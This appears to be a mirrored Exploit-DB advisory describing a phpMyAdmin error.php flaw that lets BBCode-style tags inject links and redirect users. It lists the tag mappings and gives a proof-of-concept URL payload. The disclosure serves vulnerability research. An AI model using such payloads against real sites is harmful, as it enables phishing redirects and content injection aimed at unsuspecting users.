header-logo
Suggest Exploit
vendor:
PhpMyAdmin
by:
Emanuele 'emgent' Gentili, Marco 'white_sheep' Rondini, Alessandro 'scox' Scoscia
N/A
CVSS
N/A
Client Side Code Injection and Redirect Link Falsification
Unknown
CWE
Product Name: PhpMyAdmin
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: phpmyadmin
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification

PhpMyAdmin allows inserting text and restricted tags like BBCode. By using the [a@url@page]Click Me[/a] tag, an attacker can insert their own page and redirect all users. This can be exploited by injecting special tags in the error.php file.

Mitigation:

Unknown
Source

Exploit-DB raw data:

PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification

Credits:
  Emanuele 'emgent' Gentili   <emgent@backtrack-linux.org>
  Marco 'white_sheep' Rondini <white_sheep@backtrack-linux.org>
  Alessandro 'scox' Scoscia   <scox@backtrack.it>


In error.php, PhpMyAdmin permit to insert text and restricted tag, like BBCode.
With tag [a@url@page]Click Me[/a], you can insert your own page, and redirect all users.
Available tags are:


      '[i]'       => '<em>',      
      '[/i]'      => '</em>',     
      '[em]'      => '<em>',
      '[/em]'     => '</em>',
      '[b]'       => '<strong>',  
      '[/b]'      => '</strong>', 
      '[strong]'  => '<strong>',
      '[/strong]' => '</strong>',
      '[tt]'      => '<code>',    
      '[/tt]'     => '</code>',   
      '[code]'    => '<code>',
      '[/code]'   => '</code>',
      '[kbd]'     => '<kbd>',
      '[/kbd]'    => '</kbd>',
      '[br]'      => '<br />',
      '[/a]'      => '</a>',
      '[sup]'      => '<sup>',
      '[/sup]'      => '</sup>',

      and replace '/\[a@([^"@]*)@([^]"]*)\]/' with '<a href="\1" target="\2">'


POC:

http://127.0.0.1/phpmyadmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br]It%27s+possible+use+some+special+tags+too[br]Found+by+Tiger+Security+Tiger+Team+-+[a%40http://www.tigersecurity.it%40_self]This%20Is%20a%20Link[%2Fa]


OWASP Reference:

http://www.owasp.org/index.php/Unvalidated_Input

Navigation

Suggest Exploit

Services By CQR